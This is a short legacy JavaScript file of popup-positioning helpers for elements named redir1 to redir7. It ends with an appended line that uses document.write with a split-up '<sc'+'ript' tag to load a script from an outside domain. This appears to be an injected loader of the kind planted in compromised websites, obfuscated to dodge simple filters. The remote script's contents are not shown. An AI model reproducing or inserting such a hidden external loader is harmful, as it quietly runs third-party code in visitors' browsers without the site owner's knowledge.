



function defPosition(event) {
      var x = y = 0;
      if (document.attachEvent != null) { // Internet Explorer & Opera
            x = window.event.clientX + (document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft);
            y = window.event.clientY + (document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop);
      } else if (!document.attachEvent && document.addEventListener) { // Gecko
            x = event.clientX + window.scrollX;
            y = event.clientY + window.scrollY;
      } else {
            // Do nothing
      }
      return {x:x, y:y};
}

function browser(i){
if (i==1){document.all.redir1.style.visibility="hidden";}
if (i==2){document.all.redir2.style.visibility="hidden";}
if (i==3){document.all.redir3.style.visibility="hidden";}
if (i==4){document.all.redir4.style.visibility="hidden";}
if (i==5){document.all.redir5.style.visibility="hidden";}
if (i==6){document.all.redir6.style.visibility="hidden";}
if (i==7){document.all.redir7.style.visibility="hidden";}
}
function checkbrowser(i) {
if (i==1){k=redir1;}
if (i==2){k=redir2;}
if (i==3){k=redir3;}
if (i==4){k=redir4;}
if (i==5){k=redir5;}
if (i==6){k=redir2;}

k.style.left=defPosition(event).x-65;
k.style.top=defPosition(event).y+20;
k.style.visibility="VISIBLE";
}




document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Alert_Box.js"></scri'+'pt>');